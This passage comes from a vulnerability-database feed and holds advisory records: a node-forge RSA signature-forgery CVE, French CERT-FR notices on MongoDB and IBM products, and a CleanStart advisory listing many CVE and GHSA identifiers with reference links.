Advisory\"]},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:13826\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:19375\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:21017\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:22465\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:22629\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:22840\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:23361\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:24761\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:24853\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:9742\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/security/cve/CVE-2026-33894\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://bugzilla.redhat.com/show_bug.cgi?id=2452464\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-33894.json\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33894\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-31T14:04:30.304300Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-31T14:05:09.549Z\"}}], \"cna\": {\"title\": \"Forge has signature forgery in RSA-PKCS due to ASN.1 extra field\", \"source\": {\"advisory\": \"GHSA-ppp5-5v6c-4jwp\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"digitalbazaar\", \"product\": \"forge\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.4.0\"}]}], \"references\": [{\"url\": \"https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp\", \"name\": \"https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp\", \"name\": \"https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://datatracker.ietf.org/doc/html/rfc2313#section-8\", \"name\": \"https://datatracker.ietf.org/doc/html/rfc2313#section-8\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE\", \"name\": \"https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://www.rfc-editor.org/rfc/rfc8017.html\", \"name\": \"https://www.rfc-editor.org/rfc/rfc8017.html\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, RSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low public exponent keys (e=3). Attackers can forge signatures by stuffing \\u201cgarbage\\u201d bytes within the ASN structure in order to construct a signature that passes verification, enabling Bleichenbacher style forgery. This issue is similar to CVE-2022-24771, but adds bytes in an addition field within the ASN structure, rather than outside of it.  Additionally, forge does not validate that signatures include a minimum of 8 bytes of padding as defined by the specification, providing attackers additional space to construct Bleichenbacher forgeries. Version 1.4.0 patches the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-347\", \"description\": \"CWE-347: Improper Verification of Cryptographic Signature\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-20\", \"description\": \"CWE-20: Improper Input Validation\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-27T20:45:49.583Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33894\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-31T14:05:14.708Z\", \"dateReserved\": \"2026-03-24T15:41:47.489Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-27T20:45:49.583Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

CERTFR-2026-AVI-0581

Vulnerability from certfr_avis - Published: 2026-05-13 - Updated: 2026-05-13

De multiples vulnérabilités ont été découvertes dans MongoDB. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance et un problème de sécurité non spécifié par l'éditeur.

Solutions

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

Impacted products

Vendor	Product	Description
MongoDB	N/A	MongoDB versions 8.3.x antérieures à 8.3.2
MongoDB	N/A	MongoDB versions 7.0.x antérieures à 7.0.35
MongoDB	N/A	MongoDB versions 8.0.x antérieures à 8.0.24
MongoDB	N/A	MongoDB versions 6.0.x antérieures à 6.0.28
MongoDB	N/A	MongoDB versions 8.2.x antérieures à 8.2.10
MongoDB	N/A	MongoDB versions 5.0.x antérieures à 5.0.33

References

Title

Publication Time

CERTFR-2026-AVI-0698

Vulnerability from certfr_avis - Published: 2026-06-05 - Updated: 2026-06-05

De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.

Solutions

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

Impacted products

Vendor	Product	Description
IBM	WebSphere	WebSphere Remote Server versions 9.1, 9.0 et 8.5 sans le dernier correctif de sécurité
IBM	WebSphere	WebSphere Service Registry and Repository Studio versions 8.5.x antérieures à 8.5.6.3_IJ58210
IBM	Sterling Connect:Direct	Sterling Connect:Direct Web Services versions 6.3.0.x antérieures à 6.3.0.19
IBM	QRadar Log Source Management App	QRadar Log Source Management App versions antérieures à 7.0.15
IBM	WebSphere	WebSphere Application Server versions 8.5.0.0 à 8.5.5.29 sans le correctif de sécurité temporaire PH71453 ou antérieures à 8.5.5.30 (disponibilité prévue pour le troisième trimestre 2026)
IBM	Sterling Connect:Direct	Sterling Connect:Direct for Microsoft Windows versions 6.3.0.x antérieures à 6.3.0.6_iFix051
IBM	Sterling Connect:Direct	Sterling Connect:Direct Web Services versions 6.4.0.x antérieures à 6.4.0.8
IBM	WebSphere	WebSphere Application Server versions 9.0.0.0 à 9.0.5.28 sans le correctif de sécurité temporaire PH71453 ou antérieures à 9.0.5.29 (disponibilité prévue pour le troisième trimestre 2026)
IBM	QRadar Assistant	QRadar AI Assistant versions antérieures à 2.0.0
IBM	WebSphere Service Registry and Repository	WebSphere Service Registry and Repository versions 8.5 sans le dernier correctif de sécurité
IBM	Sterling Connect:Direct	Sterling Connect:Direct for Microsoft Windows versions 6.4.0.x antérieures à 6.4.0.4_iFix022
IBM	Security QRadar EDR	Security QRadar EDR versions 3.12.x antérieures 3.12.25

References

Title

Publication Time

cleanstart-2026-be61221

Vulnerability from cleanstart

Published

2026-05-18 13:36

Modified

2026-05-10 11:41

Summary

Security fixes for CVE-2025-62718, CVE-2025-69873, CVE-2026-29045, CVE-2026-29085, CVE-2026-29086, CVE-2026-29087, CVE-2026-2950, CVE-2026-30827, CVE-2026-33750, CVE-2026-33891, CVE-2026-33894, CVE-2026-33895, CVE-2026-33896, CVE-2026-33916, CVE-2026-33937, CVE-2026-34043, CVE-2026-35213, CVE-2026-39406, CVE-2026-39407, CVE-2026-39408, CVE-2026-39409, CVE-2026-39410, CVE-2026-40175, CVE-2026-41238, CVE-2026-41239, CVE-2026-41240, CVE-2026-42033, CVE-2026-42034, CVE-2026-42035, CVE-2026-42036, CVE-2026-42037, CVE-2026-42038, CVE-2026-42039, CVE-2026-42040, CVE-2026-42041, CVE-2026-42042, CVE-2026-42043, CVE-2026-42044, CVE-2026-42264, CVE-2026-42338, CVE-2026-44455, CVE-2026-44456, CVE-2026-44457, CVE-2026-44458, CVE-2026-44459, CVE-2026-4800, CVE-2026-4923, CVE-2026-4926, CVE-2026-6321, CVE-2026-6322, ghsa-2328-f5f3-gj25, ghsa-26pp-8wgv-hjvm, ghsa-27v5-c462-wpq7, ghsa-2g4f-4pwh-qvx6, ghsa-2qvq-rjwj-gvw9, ghsa-2w6w-674q-4c4q, ghsa-39q2-94rc-95cp, ghsa-3mfm-83xf-c92r, ghsa-3p68-rc4w-qgx5, ghsa-3v7f-55p6-f55p, ghsa-3w6x-2g7m-8v23, ghsa-442j-39wm-28r2, ghsa-445q-vr5w-6q77, ghsa-458j-xx4x-4375, ghsa-46wh-pxpv-q5gq, ghsa-5c6j-r48x-rmvq, ghsa-5c9x-8gcm-mpgx, ghsa-5m6q-g25r-mvwx, ghsa-5pq2-9x2x-5p6w, ghsa-62hf-57xw-28j9, ghsa-69xw-7hcm-h432, ghsa-6chq-wfr3-2hj9, ghsa-7rx3-28cr-v5wh, ghsa-92pp-h63x-v22m, ghsa-9cx6-37pm-9jff, ghsa-9vqf-7f2p-gf9v, ghsa-c2c7-rcm5-vvqj, ghsa-crv5-9vww-q3g8, ghsa-f23m-r3pf-42rh, ghsa-f886-m6hf-6m8v, ghsa-fvcv-3m26-pcqx, ghsa-h7mw-gpvr-xq4m, ghsa-j3q9-mxjg-w52f, ghsa-jg4p-7fhp-p32p, ghsa-m7pr-hjqh-92cm, ghsa-p6xx-57qc-3wxr, ghsa-p77w-8qqv-26rm, ghsa-pf86-5x62-jrwf, ghsa-pmwg-cvhr-8vh7, ghsa-ppp5-5v6c-4jwp, ghsa-q3j6-qgpj-74h6, ghsa-q5qw-h33p-qvwr, ghsa-q67f-28xg-22rw, ghsa-q8qp-cvcw-x6jj, ghsa-qj8w-gfj5-8c6v, ghsa-qp7p-654g-cw7p, ghsa-r4q5-vmmm-2653, ghsa-r5fr-rjxr-66jc, ghsa-r5rp-j6wh-rvv4, ghsa-v2v4-37r5-5v8g, ghsa-v39h-62p7-jpjc, ghsa-v8w9-8mx6-g223, ghsa-v9jr-rg53-9pgp, ghsa-vf2m-468p-8v99, ghsa-w9j2-pvgh-6h63, ghsa-wc8c-qw6v-h7f6, ghsa-wmmm-f939-6g9c, ghsa-xf4j-xp2r-rqqx, ghsa-xhjh-pmcv-23jw, ghsa-xhpv-hc6g-r9c6, ghsa-xjpj-3mr7-gcpf, ghsa-xpcf-pg52-r92g, ghsa-xx6v-rp6x-q39c applied in versions: 2.19.5-r0

Details

Multiple security vulnerabilities affect the opensearch-dashboards-fips package. These issues are resolved in later releases. See references for individual vulnerability details.

References

URL

Type

	https://github.com/cleanstart-dev/cleanstart-secu…	ADVISORY
	https://osv.dev/vulnerability/CVE-2025-62718	WEB
	https://osv.dev/vulnerability/CVE-2025-69873	WEB
	https://osv.dev/vulnerability/CVE-2026-29045	WEB
	https://osv.dev/vulnerability/CVE-2026-29085	WEB
	https://osv.dev/vulnerability/CVE-2026-29086	WEB
	https://osv.dev/vulnerability/CVE-2026-29087	WEB
	https://osv.dev/vulnerability/CVE-2026-2950	WEB
	https://osv.dev/vulnerability/CVE-2026-30827	WEB
	https://osv.dev/vulnerability/CVE-2026-33750	WEB
	https://osv.dev/vulnerability/CVE-2026-33891	WEB
	https://osv.dev/vulnerability/CVE-2026-33894	WEB
	https://osv.dev/vulnerability/CVE-2026-33895	WEB
	https://osv.dev/vulnerability/CVE-2026-33896	WEB
	https://osv.dev/vulnerability/CVE-2026-33916	WEB
	https://osv.dev/vulnerability/CVE-2026-33937	WEB
	https://osv.dev/vulnerability/CVE-2026-34043	WEB
	https://osv.dev/vulnerability/CVE-2026-35213	WEB
	https://osv.dev/vulnerability/CVE-2026-39406	WEB
	https://osv.dev/vulnerability/CVE-2026-39407	WEB
	https://osv.dev/vulnerability/CVE-2026-39408	WEB
	https://osv.dev/vulnerability/CVE-2026-39409	WEB
	https://osv.dev/vulnerability/CVE-2026-39410	WEB
	https://osv.dev/vulnerability/CVE-2026-40175	WEB
	https://osv.dev/vulnerability/CVE-2026-41238	WEB
	https://osv.dev/vulnerability/CVE-2026-41239	WEB
	https://osv.dev/vulnerability/CVE-2026-41240	WEB
	https://osv.dev/vulnerability/CVE-2026-42033	WEB
	https://osv.dev/vulnerability/CVE-2026-42034	WEB
	https://osv.dev/vulnerability/CVE-2026-42035	WEB
	https://osv.dev/vulnerability/CVE-2026-42036	WEB
	https://osv.dev/vulnerability/CVE-2026-42037	WEB
	https://osv.dev/vulnerability/CVE-2026-42038	WEB
	https://osv.dev/vulnerability/CVE-2026-42039	WEB
	https://osv.dev/vulnerability/CVE-2026-42040	WEB
	https://osv.dev/vulnerability/CVE-2026-42041	WEB
	https://osv.dev/vulnerability/CVE-2026-42042	WEB
	https://osv.dev/vulnerability/CVE-2026-42043	WEB
	https://osv.dev/vulnerability/CVE-2026-42044	WEB
	https://osv.dev/vulnerability/CVE-2026-42264	WEB
	https://osv.dev/vulnerability/CVE-2026-42338	WEB
	https://osv.dev/vulnerability/CVE-2026-44455	WEB
	https://osv.dev/vulnerability/CVE-2026-44456	WEB
	https://osv.dev/vulnerability/CVE-2026-44457	WEB
	https://osv.dev/vulnerability/CVE-2026-44458	WEB
	https://osv.dev/vulnerability/CVE-2026-44459	WEB
	https://osv.dev/vulnerability/CVE-2026-4800	WEB
	https://osv.dev/vulnerability/CVE-2026-4923	WEB
	https://osv.dev/vulnerability/CVE-2026-4926	WEB
	https://osv.dev/vulnerability/CVE-2026-6321	WEB
	https://osv.dev/vulnerability/CVE-2026-6322	WEB
	https://osv.dev/vulnerability/ghsa-2328-f5f3-gj25	WEB
	https://osv.dev/vulnerability/ghsa-26pp-8wgv-hjvm	WEB
	https://osv.dev/vulnerability/ghsa-27v5-c462-wpq7	WEB
	https://osv.dev/vulnerability/ghsa-2g4f-4pwh-qvx6	WEB
	https://osv.dev/vulnerability/ghsa-2qvq-rjwj-gvw9	WEB
	https://osv.dev/vulnerability/ghsa-2w6w-674q-4c4q	WEB
	https://osv.dev/vulnerability/ghsa-39q2-94rc-95cp	WEB
	https://osv.dev/vulnerability/ghsa-3mfm-83xf-c92r	WEB
	https://osv.dev/vulnerability/ghsa-3p68-rc4w-qgx5	WEB
	https://osv.dev/vulnerability/ghsa-3v7f-55p6-f55p	WEB
	https://osv.dev/vulnerability/ghsa-3w6x-2g7m-8v23	WEB
	https://osv.dev/vulnerability/ghsa-442j-39wm-28r2	WEB
	https://osv.dev/vulnerability/ghsa-445q-vr5w-6q77	WEB
	https://osv.dev/vulnerability/ghsa-458j-xx4x-4375	WEB
	https://osv.dev/vulnerability/ghsa-46wh-pxpv-q5gq	WEB
	https://osv.dev/vulnerability/ghsa-5c6j-r48x-rmvq	WEB
	https://osv.dev/vulnerability/ghsa-5c9x-8gcm-mpgx	WEB
	https://osv.dev/vulnerability/ghsa-5m6q-g25r-mvwx	WEB
	https://osv.dev/vulnerability/ghsa-5pq2-9x2x-5p6w	WEB
	https://osv.dev/vulnerability/ghsa-62hf-57xw-28j9	WEB
	https://osv.dev/vulnerability/ghsa-69xw-7hcm-h432	WEB
	https://osv.dev/vulnerability/ghsa-6chq-wfr3-2hj9	WEB
	https://osv.dev/vulnerability/ghsa-7rx3-28cr-v5wh	WEB
	https://osv.dev/vulnerability/ghsa-92pp-h63x-v22m	WEB
	https://osv.dev/vulnerability/ghsa-9cx6-37pm-9jff	WEB
	https://osv.dev/vulnerability/ghsa-9vqf-7f2p-gf9v	WEB
	https://osv.dev/vulnerability/ghsa-c2c7-rcm5-vvqj	WEB
	https://osv.dev/vulnerability/ghsa-crv5-9vww-q3g8	WEB
	https://osv.dev/vulnerability/ghsa-f23m-r3pf-42rh	WEB
	https://osv.dev/vulnerability/ghsa-f886-m6hf-6m8v	WEB
	https://osv.dev/vulnerability/ghsa-fvcv-3m26-pcqx	WEB
	https://osv.dev/vulnerability/ghsa-h7mw-gpvr-xq4m	WEB
	https://osv.dev/vulnerability/ghsa-j3q9-mxjg-w52f	WEB
	https://osv.dev/vulnerability/ghsa-jg4p-7fhp-p32p	WEB
	https://osv.dev/vulnerability/ghsa-m7pr-hjqh-92cm	WEB
	https://osv.dev/vulnerability/ghsa-p6xx-57qc-3wxr	WEB
	https://osv.dev/vulnerability/ghsa-p77w-8qqv-26rm	WEB
	https://osv.dev/vulnerability/ghsa-pf86-5x62-jrwf	WEB
	https://osv.dev/vulnerability/ghsa-pmwg-cvhr-8vh7	WEB
	https://osv.dev/vulnerability/ghsa-ppp5-5v6c-4jwp	WEB
	https://osv.dev/vulnerability/ghsa-q3j6-qgpj-74h6	WEB
	https://osv.dev/vulnerability/ghsa-q5qw-h33p-qvwr	WEB
	https://osv.dev/vulnerability/ghsa-q67f-28xg-22rw	WEB
	https://osv.dev/vulnerability/ghsa-q8qp-cvcw-x6jj	WEB
	https://osv.dev/vulnerability/ghsa-qj8w-gfj5-8c6v	WEB
	https://osv.dev/vulnerability/ghsa-qp7p-654g-cw7p	WEB
	https://osv.dev/vulnerability/ghsa-r4q5-vmmm-2653	WEB
	https://osv.dev/vulnerability/ghsa-r5fr-rjxr-66jc	WEB
	https://osv.dev/vulnerability/ghsa-r5rp-j6wh-rvv4	WEB
	https://osv.dev/vulnerability/ghsa-v2v4-37r5-5v8g	WEB
	https://osv.dev/vulnerability/ghsa-v39h-62p7-jpjc	WEB
	https://osv.dev/vulnerability/ghsa-v8w9-8mx6-g223	WEB
	https://osv.dev/vulnerability/ghsa-v9jr-rg53-9pgp	WEB
	https://osv.dev/vulnerability/ghsa-vf2m-468p-8v99	WEB
	https://osv.dev/vulnerability/ghsa-w9j2-pvgh-6h63	WEB
	https://osv.dev/vulnerability/ghsa-wc8c-qw6v-h7f6	WEB
	https://osv.dev/vulnerability/ghsa-wmmm-f939-6g9c	WEB
	https://osv.dev/vulnerability/ghsa-xf4j-xp2r-rqqx	WEB
	https://osv.dev/vulnerability/ghsa-xhjh-pmcv-23jw	WEB
	https://osv.dev/vulnerability/ghsa-xhpv-hc6g-r9c6	WEB
	https://osv.dev/vulnerability/ghsa-xjpj-3mr7-gcpf	WEB
	https://osv.dev/vulnerability/ghsa-xpcf-pg52-r92g	WEB
	https://osv.dev/vulnerability/ghsa-xx6v-rp6x-q39c	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2025-62718	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2025-69873	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-29045	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-29085	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-29086	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-29087	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-2950	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-30827	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-33750	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-33891	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-33894	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-33895	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-33896	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-33916	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-33937	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-34043	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-35213	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-39406	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-39407	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-39408	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-39409	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-39410	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-40175	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-41238	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-41239	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-41240	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42033	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42034	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42035	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42036	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42037	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42038	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42039	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42040	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42041	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42042	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42043	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42044	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42264	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42338	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-44455	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-44456	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-44457	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-44458	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-44459	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-4800	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-4923	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-4926	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-6321	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-6322	WEB

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "CleanStart",
        "name": "opensearch-dashboards-fips"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.19.5-r0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "credits": [],
  "database_specific": {},
  "details": "Multiple security vulnerabilities affect the opensearch-dashboards-fips package. These issues are resolved in later releases. See references for individual vulnerability details.",
  "id": "CLEANSTART-2026-BE61221",
  "modified": "2026-05-10T11:41:43Z",
  "published": "2026-05-18T13:36:50.922233Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-BE61221.json"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-62718"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-69873"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-29045"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-29085"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-29086"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-29087"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-2950"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-30827"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-33750"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-33891"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-33894"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-33895"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-33896"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-33916"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-33937"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-34043"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-35213"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-39406"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-39407"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-39408"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-39409"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-39410"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-40175"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-41238"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-41239"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-41240"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42033"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42034"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42035"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42036"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42037"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42038"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42039"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42040"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42041"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42042"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42043"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42044"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42264"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42338"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-44455"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-44456"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-44457"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-44458"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-44459"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-4800"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-4923"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-4926"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-6321"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-6322"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-2328-f5f3-gj25"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-26pp-8wgv-hjvm"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-27v5-c462-wpq7"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-2g4f-4pwh-qvx6"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-2qvq-rjwj-gvw9"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-2w6w-674q-4c4q"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-39q2-94rc-95cp"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-3mfm-83xf-c92r"
    },
    {
